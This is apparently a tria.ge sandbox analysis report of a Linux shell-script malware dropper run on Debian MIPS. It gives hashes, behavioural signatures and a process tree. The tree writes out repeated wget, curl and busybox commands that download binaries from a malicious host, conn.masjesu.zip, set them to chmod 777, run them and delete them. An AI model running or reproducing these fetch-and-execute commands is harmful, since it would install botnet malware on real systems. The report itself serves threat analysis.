Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
95s -
max time network
97s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
15/10/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh
-
Size
10KB
-
MD5
5b7965317583f6ec3ecb200b64ab84dc
-
SHA1
242199969bb87b8f91c50399dbc9a2fcfa918cb9
-
SHA256
86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0
-
SHA512
53de4e8bcba6392755c42f5be1d230e71dbcd45fae9f4be439577b82097ac9039117b0ffed7bfe710b8e3bf6546d6c771c9b799d5b0c902e961fd5b43daf05b7
-
SSDEEP
96:YV1hXrraLcgAGdJdVPd2ZdTUcg69wLwsxLxpMLK9XKlK9l90+YWGuaYaUaG1l/VR:PAaSJSds6Pv8EdPvF8kKc
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 761 chmod 968 chmod 737 chmod 817 chmod 952 chmod 1004 chmod 880 chmod 888 chmod 944 chmod 790 chmod 864 chmod 904 chmod 1018 chmod 744 chmod 872 chmod 920 chmod 928 chmod 1011 chmod 810 chmod 841 chmod 912 chmod 983 chmod 990 chmod 997 chmod 896 chmod 936 chmod 960 chmod 976 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H 738 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM 745 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag 762 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE 791 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x 811 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw 818 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC 842 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn 865 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD 873 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj 881 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA 889 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz 897 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H 905 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak 913 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn 921 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD 929 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj 937 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA 945 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz 953 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H 961 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak 969 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H 977 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM 984 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag 991 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE 998 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x 1005 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw 1012 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC 1019 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 755 busybox 820 wget 825 curl 846 wget 980 curl 1015 curl 809 busybox 869 curl 876 wget 940 wget 806 curl 877 curl 908 wget 951 busybox 1001 curl 747 wget 766 wget 796 wget 979 wget 1008 curl 893 curl 919 busybox 1014 wget 863 busybox 903 busybox 735 busybox 740 wget 925 curl 943 busybox 949 curl 956 wget 957 curl 743 busybox 816 busybox 887 busybox 892 wget 895 busybox 916 wget 935 busybox 941 curl 972 wget 996 busybox 729 curl 741 curl 814 curl 909 curl 917 curl 959 busybox 973 curl 715 wget 748 curl 927 busybox 871 busybox 948 wget 986 wget 989 busybox 1003 busybox 777 curl 785 busybox 868 wget 885 curl 932 wget 933 curl 967 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw curl File opened for modification /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA curl File opened for modification /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE curl File opened for modification /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw curl File opened for modification /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H curl File opened for modification /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM curl File opened for modification /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x curl File opened for modification /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn curl File opened for modification /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD curl File opened for modification /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x curl File opened for modification /tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA curl File opened for modification /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H curl File opened for modification /tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H curl File opened for modification /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM curl File opened for modification /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj curl File opened for modification /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag curl File opened for modification /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE curl File opened for modification /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz curl File opened for modification /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak curl File opened for modification /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag curl File opened for modification /tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn curl File opened for modification /tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD curl File opened for modification /tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj curl File opened for modification /tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz curl File opened for modification /tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak curl File opened for modification /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC curl File opened for modification /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H curl File opened for modification /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC curl
Processes
-
/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh/tmp/86576240c29eb7ccff97998ea28c3e1bdc19017938d1c2735faeeff2c59156b0.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:707
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- System Network Configuration Discovery
PID:735
-
-
/bin/chmodchmod 777 cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵
- Executes dropped EXE
PID:738
-
-
/bin/rmrm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H2⤵PID:739
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:740
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM2⤵PID:746
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:747
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- System Network Configuration Discovery
PID:755
-
-
/bin/chmodchmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:766
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- System Network Configuration Discovery
PID:785
-
-
/bin/chmodchmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE2⤵PID:794
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:796
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x2⤵PID:812
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:813
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw2⤵PID:819
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- System Network Configuration Discovery
PID:820
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:833
-
-
/bin/chmodchmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC2⤵PID:845
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:846
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:879
-
-
/bin/chmodchmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:891
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:895
-
-
/bin/chmodchmod 777 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz./6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm 6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵PID:899
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:900
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- System Network Configuration Discovery
PID:903
-
-
/bin/chmodchmod 777 kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H./kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H2⤵PID:907
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- System Network Configuration Discovery
PID:908
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:911
-
-
/bin/chmodchmod 777 RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak./RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak2⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- System Network Configuration Discovery
PID:919
-
-
/bin/chmodchmod 777 YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn./YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD./Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj./rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA./dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz2⤵
- System Network Configuration Discovery
PID:948
-
-
